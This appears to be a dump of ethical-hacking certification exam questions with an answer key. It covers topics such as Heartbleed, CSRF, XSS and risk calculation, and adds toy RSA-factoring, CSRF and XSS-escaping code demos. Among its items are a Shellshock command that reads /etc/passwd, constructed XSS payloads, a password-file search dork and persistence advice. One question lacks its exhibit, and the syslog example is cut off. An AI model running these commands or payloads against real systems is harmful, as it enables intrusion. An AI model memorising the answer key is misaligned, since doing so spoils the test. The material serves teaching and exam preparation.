
Explanation/Reference:

QUESTION 239
The Heartbleed bug was discovered in 2014 and is widely referred to under MITRE's Common Vulnerabilities
and Exposures (CVE) as CVE-2014-0160.
This bug affects the OpenSSL implementation of the transport layer security (TLS) protocols defined in
RFC6520.

What type of key does this bug leave exposed to the Internet making exploitation of any compromised system
very easy?

A. Private
B. Public
C. Shared
D. Root

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 240
In 2007, this wireless security algorithm was rendered useless by capturing packets and discovering the
passkey in a matter of seconds. This security flaw led to a network invasion of TJ Maxx and data theft through a
technique known as wardriving.

Which Algorithm is this referring to?

A. Wired Equivalent Privacy (WEP)
B. Wi-Fi Protected Access (WPA)
C. Wi-Fi Protected Access 2 (WPA2)
D. Temporal Key Integrity Protocol (TKIP)

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 241
This international organization regulates billions of transactions daily and provides security guidelines to protect
personally identifiable information (PII). These security controls provide a baseline and prevent low-level
hackers sometimes known as script kiddies from causing a data breach.
Which of the following organizations is being described?

A. Payment Card Industry (PCI)
B. Center for Disease Control (CDC)
C. Institute of Electrical and Electronics Engineers (IEEE)
D. International Security Industry Organization (ISIO)

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 242
Your company performs penetration tests and security assessments for small and medium-sized businesses in
the local area. During a routine security assessment, you discover information that suggests your client is
involved with human trafficking.

What should you do?

A. Immediately stop work and contact the proper legal authorities.
B. Copy the data to removable media and keep it in case you need it.
C. Confront the client in a respectful manner and ask her about the data.
D. Ignore the data and continue the assessment until completed as agreed.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 243
Jesse receives an email with an attachment labeled "Court_Notice_21206.zip". Inside the zip file is a file named
"Court_Notice_21206.docx.exe" disguised as a word document. Upon execution, a window appears stating, "This
word document is corrupt." In the background, the file copies itself to Jesse's APPDATA\local directory and
begins to beacon to a C2 server to download additional malicious binaries.

What type of malware has Jesse encountered?

A. Trojan
B. Worm
C. Macro Virus
D. Key-Logger

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 244
Which tool allows analysts and pen testers to examine links between data using graphs and link analysis?

A. Maltego
B. Cain & Abel
C. Metasploit
D. Wireshark

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 245
While using your bank's online servicing you notice the following string in the URL bar:
"http://www.MyPersonalBank.com/account?id=368940911028389&Damount=10980&Camount=21"

You observe that if you modify the Damount & Camount values and submit the request, the data on the web
page reflects the changes.

Which type of vulnerability is present on this site?

A. Web Parameter Tampering
B. Cookie Tampering
C. XSS Reflection
D. SQL injection

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 246
Prospective clients want to see sample reports from previous penetration tests. What should you do next?

A. Decline, but provide references.
B. Share full reports, not redacted.
C. Share full reports with redactions.
D. Share reports after an NDA is signed.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 247
During a blackbox pen test you attempt to pass IRC traffic over port 80/TCP from a compromised web enabled
host. The traffic gets blocked; however, outbound HTTP traffic is unimpeded.

What type of firewall is inspecting outbound traffic?

A. Application
B. Circuit
C. Stateful
D. Packet Filtering

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 248
Jimmy is standing outside a secure entrance to a facility. He is pretending to have a tense conversation on his
cell phone as an authorized employee badges in.
Jimmy, while still on the phone, grabs the door as it begins to close. What just happened?

A. Piggybacking
B. Masquerading
C. Phishing
D. Whaling

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 249
You've gained physical access to a Windows 2008 R2 server which has an accessible disc drive. When you
attempt to boot the server and log in, you are unable to guess the password. In your tool kit you have an Ubuntu
9.10 Linux LiveCD. Which Linux based tool has the ability to change any user's password or to activate disabled
Windows accounts?

A. CHNTPW
B. Cain & Abel
C. SET
D. John the Ripper

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 250
An attacker has installed a RAT on a host. The attacker wants to ensure that when a user attempts to go to
"www.MyPersonalBank.com", that the user is directed to a phishing site.

Which file does the attacker need to modify?

A. Hosts
B. Sudoers
C. Boot.ini
D. Networks

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 251
After trying multiple exploits, you've gained root access to a Centos 6 server. To ensure you maintain access,
what would you do first?

A. Create User Account
B. Disable Key Services
C. Disable IPTables
D. Download and Install Netcat

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 252
env x=`(){ :;};echo exploit` bash -c 'cat /etc/passwd'

What is the Shellshock bash vulnerability attempting to do on a vulnerable Linux host?

A. Display passwd content to prompt
B. Removes the passwd file
C. Changes all passwords in passwd
D. Add new user to the passwd file

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 253
Using Windows CMD, how would an attacker list all the shares to which the current user context has access?

A. NET USE
B. NET CONFIG
C. NET FILE
D. NET VIEW

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 254
A common cryptographical tool is the use of XOR. XOR the following binary values:

10110001
00111010

A. 10001011
B. 11011000
C. 10011101
D. 10111100

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 255
Which of the following is the successor of SSL?

A. TLS
B. RSA
C. GRE
D. IPSec

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 256
You are attempting to man-in-the-middle a session. Which protocol will allow you to guess a sequence
number?

A. TCP
B. UDP
C. ICMP
D. UPX

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 257
Your team has won a contract to infiltrate an organization. The company wants to have the attack be as realistic
as possible; therefore, they did not provide any information besides the company name.

What should be the first step in security testing the client?

A. Reconnaissance
B. Enumeration
C. Scanning
D. Escalation

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 258
Which regulation defines security and privacy controls for Federal information systems and organizations?

A. NIST-800-53
B. PCI-DSS
C. EU Safe Harbor
D. HIPAA

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 259
How does the Address Resolution Protocol (ARP) work?

A. It sends a request packet to all the network elements, asking for the MAC address from a specific IP.
B. It sends a reply packet to all the network elements, asking for the MAC address from a specific IP.
C. It sends a reply packet for a specific IP, asking for the MAC address.
D. It sends a request packet to all the network elements, asking for the domain name from a specific IP.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 260
You are performing information gathering for an important penetration test. You have found pdf, doc, and
images in your objective. You decide to extract metadata from these files and analyze it.

What tool will help you with the task?

A. Metagoofil
B. Armitage
C. Dimitry
D. cdpsnarf

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 261
When you are collecting information to perform a data analysis, Google commands are very useful to find
sensitive information and files. These files may contain information about passwords, system functions, or
documentation.

What command will help you to search files using Google as a search engine?

A. site: target.com filetype:xls username password email
B. inurl: target.com filename:xls username password email
C. domain: target.com archive:xls username password email
D. site: target.com file:xls username password email

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 262
What is a "Collision attack" in cryptography?

A. Collision attacks try to find two inputs producing the same hash.
B. Collision attacks try to break the hash into two parts, with the same bytes in each part to get the private key.
C. Collision attacks try to get the public key.
D. Collision attacks try to break the hash into three parts to get the plaintext value.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 263
You are tasked to perform a penetration test. While you are performing information gathering, you find an
employee list in Google. You find the receptionist's email, and you send her an email changing the source email
to her boss's email( boss@company ). In this email, you ask for a pdf with information. She reads your email
and sends back a pdf with links. You exchange the pdf links with your malicious links (these links contain
malware) and send back the modified pdf, saying that the links don't work. She reads your email, opens the
links, and her machine gets infected. You now have access to the company network.

What testing method did you use?

A. Social engineering
B. Tailgating
C. Piggybacking
D. Eavesdropping

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 264
When you are getting information about a web server, it is very important to know the HTTP Methods (GET,
POST, HEAD, PUT, DELETE, TRACE) that are available because there are two critical methods (PUT and
DELETE). PUT can upload a file to the server and DELETE can delete a file from the server. You can detect all
these methods (GET, POST, HEAD, PUT, DELETE, TRACE) using NMAP script engine.

What nmap script will help you with this task?

A. http-methods
B. http-enum
C. http-headers
D. http-git

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 265
When you are testing a web application, it is very useful to employ a proxy tool to save every request and
response. You can manually test every request and analyze the response to find vulnerabilities. You can test
parameter and headers manually to get more precise results than if using web vulnerability scanners.

What proxy tool will help you find web vulnerabilities?

A. Burpsuite
B. Maskgen
C. Dimitry
D. Proxychains

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 266
You are a Network Security Officer. You have two machines. The first machine (192.168.0.99) has Snort
installed, and the second machine (192.168.0.150) has Kiwi Syslog installed. You perform a SYN scan of your
network, and you notice that Kiwi Syslog is not receiving the alert message from Snort. You decide to run
Wireshark on the Snort machine to check whether the messages are going to the Kiwi Syslog machine.

What Wireshark filter will show the connections from the Snort machine to the Kiwi Syslog machine?

A. tcp.dstport==514 && ip.dst==192.168.0.150
B. tcp.srcport==514 && ip.src==192.168.0.99
C. tcp.dstport==514 && ip.dst==192.168.0.0/16
D. tcp.srcport==514 && ip.src==192.168.150

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:
The filter selects packets leaving the Snort host for the collector's syslog port. Syslog is carried over UDP/514
by default; if the sensor sends its alerts over UDP, the TCP filter shows nothing even though the messages are
on the wire, and udp.dstport==514 && ip.dst==192.168.0.150 is the filter to use.

QUESTION 267
This asymmetric cipher is based on the difficulty of factoring the product of two large prime numbers. What
cipher is described above?

A. RSA
B. SHA
C. RC5
D. MD5

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:
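Textbook RSA with deliberately tiny primes, as an added example that is not part of the original page: key generation, encryption and decryption, followed by the attack the question alludes to, recovering the private exponent by factoring n. The primes 10007 and 10009 and the message value are chosen for the demo; real keys use a 2048-bit n precisely so that this factoring step is infeasible. Requires Python 3.8 or later for the three-argument pow.

```python
"""Textbook RSA with tiny primes, then recovery of the private key by factoring n.

Added example, not from the exam page. The primes are small so that trial
division finishes instantly; the security of real RSA rests entirely on the
fact that no known algorithm can do this for a 2048-bit modulus.
"""
from math import gcd, isqrt


def keygen(p, q, e=65537):
    """Return (public, private) = ((n, e), (n, d)) from two primes p and q."""
    n = p * q
    phi = (p - 1) * (q - 1)            # Euler's totient of n = p*q
    if gcd(e, phi) != 1:
        raise ValueError("e must be coprime to phi(n)")
    d = pow(e, -1, phi)                # modular inverse of e (Python >= 3.8)
    return (n, e), (n, d)


def encrypt(pub, m):
    n, e = pub
    if not 0 <= m < n:
        raise ValueError("message must be an integer in [0, n)")
    return pow(m, e, n)


def decrypt(priv, c):
    n, d = priv
    return pow(c, d, n)


def factor_trial(n):
    """Recover a prime factor of n by trial division (feasible only for toy n)."""
    if n % 2 == 0:
        return 2
    for f in range(3, isqrt(n) + 1, 2):
        if n % f == 0:
            return f
    raise ValueError("no factor found; n is prime")


def recover_private_key(pub):
    """The attack: factor n, rebuild phi(n), recompute d from the public e."""
    n, e = pub
    p = factor_trial(n)
    q = n // p
    phi = (p - 1) * (q - 1)
    return (n, pow(e, -1, phi))


if __name__ == "__main__":
    pub, priv = keygen(10007, 10009)       # toy primes chosen for the demo
    c = encrypt(pub, 424242)               # constructed message value
    print("ciphertext:", c)
    print("decrypt with real key:     ", decrypt(priv, c))        # 424242
    stolen = recover_private_key(pub)      # attacker sees only (n, e)
    print("decrypt with recovered key:", decrypt(stolen, c))      # 424242
```

Textbook RSA as shown here is deterministic and malleable; deployed systems wrap the message with OAEP padding (and PSS for signatures) before applying the exponentiation.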

QUESTION 268
Which of the following parameters describe LM Hash (see exhibit): Exhibit:
A. I, II, and III
B. I
C. II
D. I and II

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 269
What is the process of logging, recording, and resolving events that take place in an organization?

A. Incident Management Process


B. Security Policy
C. Internal Procedure
D. Metrics

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 270
The Open Web Application Security Project (OWASP) is the worldwide not-for-profit charitable organization
focused on improving the security of software.
What item is the primary concern on OWASP's Top Ten Project Most Critical Web Application Security Risks?

A. Injection
B. Cross Site Scripting
C. Cross Site Request Forgery
D. Path disclosure

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 271
You are performing a penetration test. You achieved access via a buffer overflow exploit and you proceed to
find interesting data, such as files with usernames and passwords. You find a hidden folder that has the
administrator's bank account password and login information for the administrator's bitcoin account.

What should you do?

A. Report immediately to the administrator
B. Do not report it and continue the penetration test.
C. Transfer money from the administrator's account to another account.
D. Do not transfer the money but steal the bitcoins.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 272
Which of the following describes the characteristics of a Boot Sector Virus?

A. Moves the MBR to another location on the hard disk and copies itself to the original location of the MBR
B. Moves the MBR to another location on the RAM and copies itself to the original location of the MBR
C. Modifies directory table entries so that directory entries point to the virus code instead of the actual program
D. Overwrites the original MBR and only executes the new virus code

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 273
You have several plain-text firewall logs that you must review to evaluate network traffic. You know that in order
to do fast, efficient searches of the logs you must use regular expressions.

Which command-line utility are you most likely to use?

A. Grep
B. Notepad
C. MS Excel
D. Relational Database

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 274
You've just been hired to perform a pen test on an organization that has been subjected to a large-scale attack.
The CIO is concerned with mitigating threats and vulnerabilities to totally eliminate risk.

What is one of the first things you should do when given the job?

A. Explain to the CIO that you cannot eliminate all risk, but you will be able to reduce risk to acceptable levels.
B. Interview all employees in the company to rule out possible insider threats.
C. Establish attribution to suspected attackers.
D. Start the wireshark application to start sniffing network traffic.

Correct Answer: A
Section: (none)
Explanation
Explanation/Reference:

QUESTION 275
A penetration tester is conducting a port scan on a specific host. The tester found several open ports that
made it hard to conclude which Operating System (OS) version is installed. Considering the NMAP result below,
which of the following is most likely true of the target machine?

Starting NMAP 5.21 at 2011-03-15 11:06
NMAP scan report for 172.16.40.65
Host is up (1.00s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
23/tcp   open  telnet
80/tcp   open  http
139/tcp  open  netbios-ssn
515/tcp  open
631/tcp  open  ipp
9100/tcp open
MAC Address: 00:00:48:0D:EE:8

A. The host is likely a printer.


B. The host is likely a Windows machine.
C. The host is likely a Linux machine.
D. The host is likely a router.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:
Ports 515 (LPD), 631 (IPP) and 9100 (raw "JetDirect" printing) open together are the signature of a network
printer; the FTP, telnet and HTTP services are its management interfaces.

QUESTION 276
Which of the following is the least-likely physical characteristic to be used in biometric control that supports a
large company?

A. Height and Weight


B. Voice
C. Fingerprints
D. Iris patterns

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 277
Which of the following is not a Bluetooth attack?

A. Bluedriving
B. Bluejacking
C. Bluesmacking
D. Bluesnarfing

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:
QUESTION 278
This phase will increase the odds of success in later phases of the penetration test. It is also the very first step
in Information Gathering, and it will tell you what the "landscape" looks like.

What is the most important phase of ethical hacking in which you need to spend a considerable amount of
time?

A. footprinting
B. network mapping
C. gaining access
D. escalating privileges

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 279
The purpose of a ________ is to deny network access to local area networks and other information assets by
unauthorized wireless devices.

A. Wireless Intrusion Prevention System


B. Wireless Access Point
C. Wireless Access Control List
D. Wireless Analyzer

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 280
> NMAP -sn 192.168.11.200-215

The NMAP command above performs which of the following?

A. A ping scan
B. A trace sweep
C. An operating system detect
D. A port scan

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 281
You are resolving domain names into IP addresses for a later ping sweep with NMAP. Which of the following
commands looks up IP addresses?
A. >host -t a hackeddomain.com
B. >host -t soa hackeddomain.com
C. >host -t ns hackeddomain.com
D. >host -t AXFR hackeddomain.com

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 282
Which of the following is a command line packet analyzer similar to GUI-based Wireshark?

A. tcpdump
B. nessus
C. Ethereal
D. John the Ripper

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 283
This configuration allows a wired or wireless network interface controller to pass all traffic it receives to the
central processing unit (CPU), rather than passing only the frames that the controller is intended to receive.

Which of the following is being described?

A. promiscuous mode
B. port forwarding
C. multi-cast mode
D. WEM

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 284
Which of the following is an extremely common IDS evasion technique in the web world?

A. unicode characters
B. spyware
C. port knocking
D. subnetting

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 285
Which of the following is the structure designed to verify and authenticate the identity of individuals within the
enterprise taking part in a data exchange?

A. PKI
B. single sign on
C. biometrics
D. SOA

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 286
Which of the following is a design pattern based on distinct pieces of software providing application functionality
as services to other applications?

A. Service Oriented Architecture


B. Object Oriented Architecture
C. Lean Coding
D. Agile Process

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 287
Which mode of IPSec should you use to assure security and confidentiality of data within the same LAN?

A. ESP transport mode
B. AH promiscuous
C. ESP confidential
D. AH Tunnel mode

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 288
Which of the following is assured by the use of a hash?

A. Integrity
B. Confidentiality
C. Authentication
D. Availability

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 289
Which of the following is the greatest threat posed by backups?

A. A backup is the source of Malware or illicit information.


B. A backup is unavailable during disaster recovery.
C. A backup is incomplete because no verification was performed.
D. An un-encrypted backup can be misplaced or stolen.

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 290
An incident investigator asks to receive a copy of the event logs from all firewalls, proxy servers, and Intrusion
Detection Systems (IDS) on the network of an organization that has experienced a possible breach of security.
When the investigator attempts to correlate the information in all of the logs, the sequence of many of the
logged events does not match up.
What is the most likely cause?

A. The network devices are not all synchronized.


B. Proper chain of custody was not observed while collecting the logs.
C. The attacker altered or erased events from thelogs.
D. The security breach was a falsepositive.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 291
In Risk Management, how is the term "likelihood" related to the concept of "threat?"

A. Likelihood is the probability that a threat-source will exploit a vulnerability.


B. Likelihood is a possible threat-source that may exploit a vulnerability.
C. Likelihood is the likely source of a threat that could exploit a vulnerability.
D. Likelihood is the probability that a vulnerability is a threat-source.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 292
The chance of a hard drive failure is once every three years. The cost to buy a new hard drive is $300. It will
require 10 hours to restore the OS and software to the new hard disk. It will require a further 4 hours to restore
the database from the last backup to the new hard disk. The recovery person earns $10/hour.
Calculate the SLE, ARO, and ALE. Assume the EF = 1 (100%).

What is the closest approximate cost of this replacement and recovery operation per year?

A. $146
B. $1320
C. $440
D. $100

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:
SLE = (cost of the drive + recovery labour) × EF = ($300 + 14 hours × $10/hour) × 1 = $440.
ARO = 1 failure per 3 years = 0.33.
ALE = SLE × ARO = $440 × 0.33 = $146.67, so roughly $146 per year. $440 is the cost of a single loss event, not
the annual cost, and $1320 is three years' worth.

QUESTION 293
A network administrator discovers several unknown files in the root directory of his Linux FTP server. One of
the files is a tarball, two are shell script files, and another is a binary file named "nc." The FTP server's
access logs show that the anonymous user account logged in to the server, uploaded the files, extracted
the contents of the tarball and ran the script using a function provided by the FTP server's software. The ps
command shows that the nc file is running as a process, and the netstat command shows the nc process is
listening on a network port.

What kind of vulnerability must be present to make this remote attack possible?

A. File system permissions


B. Privilege escalation
C. Directory traversal
D. Brute force login

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 294
While performing online banking using a Web browser, a user receives an email that contains a link to an
interesting Web site. When the user clicks on the link, another Web browser session starts and displays a
video of cats playing a piano. The next business day, the user receives what looks like an email from his
bank, indicating that his bank account has been accessed from a foreign country. The email asks the user to
call his bank and verify the authorization of a funds transfer that took place.

What Web browser-based security vulnerability was exploited to compromise the user?

A. Cross-Site Request Forgery


B. Cross-Site Scripting
C. Clickjacking
D. Web form input validation

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:
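The mechanism behind the scenario, as an added example that is not part of the original page: a transfer endpoint that trusts the session cookie alone, beside one that also demands a per-session CSRF token. Requests are plain dicts standing in for a framework's request object, and the session store, balances, user names and server secret are constructed for the demo. The attacker's page can make the victim's browser send the bank's cookie, but it cannot read the victim's session, so it cannot supply a token derived from it.

```python
"""Why the bank transfer went through, and one fix: a per-session CSRF token.

Added example, not from the exam page. Requests are plain dicts standing in
for a framework's request object; the session store, balances and secret are
constructed for the demo.
"""
import hashlib
import hmac
import secrets

SERVER_SECRET = secrets.token_bytes(32)          # constructed deployment secret
SESSIONS = {}                                    # session id -> {"user", "csrf"}
BALANCES = {"alice": 1000, "bob": 0, "mallory": 0}


def login(user):
    """Create a session and a CSRF token bound to that session id."""
    sid = secrets.token_urlsafe(16)
    token = hmac.new(SERVER_SECRET, sid.encode(), hashlib.sha256).hexdigest()
    SESSIONS[sid] = {"user": user, "csrf": token}
    return sid, token


def _do_transfer(src, dst, amount):
    if amount <= 0 or dst not in BALANCES or BALANCES.get(src, 0) < amount:
        return 400, "invalid transfer"
    BALANCES[src] -= amount
    BALANCES[dst] += amount
    return 200, "ok"


def transfer_vulnerable(request):
    """Trusts the session cookie alone. Any page the victim visits can make the
    browser submit this form with the cookie attached, which is the attack."""
    sess = SESSIONS.get(request["cookies"].get("sid"))
    if not sess:
        return 401, "not logged in"
    form = request["form"]
    return _do_transfer(sess["user"], form["to"], int(form["amount"]))


def transfer_hardened(request):
    """Additionally requires the session's CSRF token in the form body."""
    sess = SESSIONS.get(request["cookies"].get("sid"))
    if not sess:
        return 401, "not logged in"
    form = request["form"]
    # constant-time comparison so the check does not leak the token by timing
    if not hmac.compare_digest(form.get("csrf", ""), sess["csrf"]):
        return 403, "csrf token missing or invalid"
    return _do_transfer(sess["user"], form["to"], int(form["amount"]))


def forged_request(victim_sid):
    """What the cat-video page makes the victim's browser send: the bank cookie
    rides along automatically; the token field is absent."""
    return {"cookies": {"sid": victim_sid},
            "form": {"to": "mallory", "amount": "500"}}


def legitimate_request(sid, token):
    """The bank's own form, which embeds the token as a hidden field."""
    return {"cookies": {"sid": sid},
            "form": {"to": "bob", "amount": "100", "csrf": token}}


if __name__ == "__main__":
    sid, token = login("alice")
    print("vulnerable, forged:", transfer_vulnerable(forged_request(sid)))        # (200, 'ok')
    print("hardened, forged  :", transfer_hardened(forged_request(sid)))          # (403, ...)
    print("hardened, legit   :", transfer_hardened(legitimate_request(sid, token)))  # (200, 'ok')
    print("balances:", BALANCES)
```

The token is what web frameworks generate for you; setting the session cookie with SameSite=Lax or Strict and checking the Origin header on state-changing requests are the usual second and third layers.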

QUESTION 295
A company's security policy states that all Web browsers must automatically delete their HTTP browser cookies
upon terminating. What sort of security breach is this policy attempting to mitigate?

A. Attempts by attackers to access Web sites that trust the Web browser user by stealing the user's
authentication credentials.
B. Attempts by attackers to access the user and password information stored in the company's SQL database.
C. Attempts by attackers to access passwords stored on the user's computer without the user's knowledge.
D. Attempts by attackers to determine the user's Web browser usage patterns, including when sites were
visited and for how long.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 296
A company's Web development team has become aware of a certain type of security vulnerability in their Web
software. To mitigate the possibility of this vulnerability being exploited, the team wants to modify the software
requirements to disallow users from entering HTML as input into their Web application.

What kind of Web application vulnerability likely exists in their software?

A. Cross-site scripting vulnerability
B. Cross-site Request Forgery vulnerability
C. SQL injection vulnerability
D. Web site defacement vulnerability

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 297
Which of the following is considered the best way to protect Personally Identifiable Information (PII) from Web
application vulnerabilities?

A. Use cryptographic storage to store all PII
B. Use encrypted communications protocols to transmit PII
C. Use full disk encryption on all hard drives to protect PII
D. Use a security token to log into all Web applications that use PII

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 298
Which of the following is one of the most effective ways to prevent Cross-site Scripting (XSS) flaws in software
applications?

A. Validate and escape all information sent to a server
B. Use security policies and procedures to define and implement proper security settings
C. Verify access rights before allowing access to protected information and UI controls
D. Use digital certificates to authenticate a server prior to sending data

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:
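The control behind questions 296 and 298, as an added example that is not part of the original page: the "no HTML in input" rule from question 296 as a naive filter, the output escaping from question 298 beside it, and a parser that inspects the rendered page the way a browser would. The page fragments, filter and payloads are constructed for the demo. The point worth seeing is that stripping angle brackets blocks a script tag but not an attribute breakout, while escaping for the output context blocks both.

```python
"""Output encoding against XSS, and why 'no HTML in input' alone is not enough.

Added example for questions 296 and 298; not from the exam page. The page
fragments, the filter and the payloads are constructed for the demo.
"""
import html
from html.parser import HTMLParser


def strip_angle_brackets(user_input):
    """Question 296's requirement ('disallow HTML') as a naive input filter."""
    return user_input.replace("<", "").replace(">", "")


def render_vulnerable(name):
    """Raw interpolation into two contexts: element text and a quoted attribute."""
    return f'<p>Hello {name}</p><input value="{name}">'


def render_escaped(name):
    """Question 298's control: escape for HTML text and attributes. quote=True
    also encodes the quote characters that attribute breakouts rely on."""
    safe = html.escape(name, quote=True)
    return f'<p>Hello {safe}</p><input value="{safe}">'


class _ScriptFinder(HTMLParser):
    """Parse rendered HTML as a browser would and collect anything that runs
    script: <script> elements and on* event-handler attributes."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self.findings.append("script element")
        for attr_name, _ in attrs:
            if attr_name.lower().startswith("on"):
                self.findings.append(f"{attr_name} handler on <{tag}>")


def script_findings(rendered_html):
    """Return a list describing every script-executing construct in the page."""
    finder = _ScriptFinder()
    finder.feed(rendered_html)
    finder.close()
    return finder.findings


if __name__ == "__main__":
    tag_payload = "<script>alert(1)</script>"      # constructed
    attr_payload = '" onmouseover="alert(1)'        # constructed; contains no < or >
    print(script_findings(render_vulnerable(tag_payload)))                          # ['script element']
    print(script_findings(render_vulnerable(strip_angle_brackets(tag_payload))))    # []
    print(script_findings(render_vulnerable(strip_angle_brackets(attr_payload))))   # ['onmouseover handler on <input>']
    print(script_findings(render_escaped(attr_payload)))                            # []
```

html.escape is right for HTML text and quoted attributes only; data written into a JavaScript string, a URL or a CSS value needs the encoder for that context, which is why template engines choose the encoder per insertion point.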

QUESTION 299
An Internet Service Provider (ISP) has a need to authenticate users connecting using analog modems, Digital
Subscriber Lines (DSL), wireless data services, and Virtual Private Networks (VPN) over a Frame Relay
network.
Which AAA protocol is most likely able to handle this requirement?

A. RADIUS
B. DIAMETER
C. Kerberos
D. TACACS+

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 300
A new wireless client is configured to join an 802.11 network. This client uses the same hardware and software
as many of the other clients on the network. The client can see the network, but cannot connect. A wireless
packet sniffer shows that the Wireless Access Point (WAP) is not responding to the association requests being
sent by the wireless client.

What is a possible source of this problem?

A. The WAP does not recognize the client's MAC address
B. The client cannot see the SSID of the wireless network
C. Client is configured for the wrong channel
D. The wireless client is not configured to use DHCP

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 301
An Intrusion Detection System (IDS) has alerted the network administrator to a possibly malicious sequence of
packets sent to a Web server in the network's external DMZ. The packet traffic was captured by the IDS and
saved to a PCAP file.

What type of network tool can be used to determine if these packets are genuinely malicious or simply a false
positive?

A. Protocol analyzer
B. Intrusion Prevention System (IPS)
C. Network sniffer
D. Vulnerability scanner

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 302
An attacker gains access to a Web server's database and displays the contents of the table that holds all of the
names, passwords, and other user information. The attacker did this by entering information into the Web site's
user login page that the software's designers did not expect to be entered. This is an example of what kind of
software design problem?

A. Insufficient input validation


B. Insufficient exception handling
C. Insufficient database hardening
D. Insufficient security management

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 303
Which of the following is a protocol specifically designed for transporting event messages?

A. SYSLOG
B. SMS
C. SNMP
D. ICMP

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:
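The message format itself, as an added example that is not part of the original page: build and parse BSD syslog (RFC 3164) lines, the format a Snort sensor's syslog output sends to a collector such as the Kiwi Syslog host in question 266. The alert text, host name, PID and rule identifier are constructed for the demo. The PRI field in angle brackets packs facility and severity into one number, and it is the first thing to check when a collector "receives nothing": a message with an unexpected facility is filed in a different log, and one without a valid PRI is often discarded.

```python
"""Build and parse BSD syslog (RFC 3164) messages.

Added example, not from the exam page; the alert text is constructed.
"""
import re
import socket
import time

# facility and severity numbers from RFC 3164 section 4.1.1
FACILITIES = {"kern": 0, "user": 1, "mail": 2, "daemon": 3, "auth": 4,
              "syslog": 5, "local0": 16, "local1": 17, "local7": 23}
SEVERITIES = {"emerg": 0, "alert": 1, "crit": 2, "err": 3,
              "warning": 4, "notice": 5, "info": 6, "debug": 7}

_MSG_RE = re.compile(
    r"^<(?P<pri>\d{1,3})>"                                  # <PRI>
    r"(?P<ts>[A-Z][a-z]{2} [ \d]\d \d\d:\d\d:\d\d) "        # Mmm dd hh:mm:ss
    r"(?P<host>\S+) "
    r"(?P<tag>[^:\[ ]+)(?:\[(?P<pid>\d+)\])?: ?"            # tag[pid]:
    r"(?P<msg>.*)$")


def encode_pri(facility, severity):
    return facility * 8 + severity

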